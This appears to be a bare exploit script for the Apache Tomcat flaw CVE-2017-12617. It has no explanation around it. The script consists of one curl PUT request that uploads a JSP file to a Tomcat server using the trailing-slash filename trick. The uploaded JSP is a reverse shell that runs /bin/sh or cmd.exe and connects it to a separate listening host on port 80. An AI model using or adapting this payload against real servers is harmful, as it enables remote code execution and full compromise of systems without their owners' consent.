CVE-2017-12617 Apache Tomcat Manual exploit

exploit.sh

curl -X PUT \
  http://192.168.1.97:8080/exploit1.jsp/ \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' \
  -H 'Cache-Control: no-cache' \
  -H 'Cookie: 3CF55E9DEF8C504D35340369C389EF8A' \
  -H 'Postman-Token: a38a0a36-da12-5b6f-3d56-339e13381c36' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36' \
  -d '<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
  class StreamConnector extends Thread
  {
    InputStream xk;
    OutputStream ak;

    StreamConnector( InputStream xk, OutputStream ak )
    {
      this.xk = xk;
      this.ak = ak;
    }

    public void run()
    {
      BufferedReader zd  = null;
      BufferedWriter hgm = null;
      try
      {
        zd  = new BufferedReader( new InputStreamReader( this.xk ) );
        hgm = new BufferedWriter( new OutputStreamWriter( this.ak ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = zd.read( buffer, 0, buffer.length ) ) > 0 )
        {
          hgm.write( buffer, 0, length );
          hgm.flush();
        }
      } catch( Exception e ){}
      try
      {
        if( zd != null )
          zd.close();
        if( hgm != null )
          hgm.close();
      } catch( Exception e ){}
    }
  }

  try
  {
    String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
  ShellPath = new String("/bin/sh");
} else {
  ShellPath = new String("cmd.exe");
}

    Socket socket = new Socket( "192.168.2.2", 80 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}
%>
     '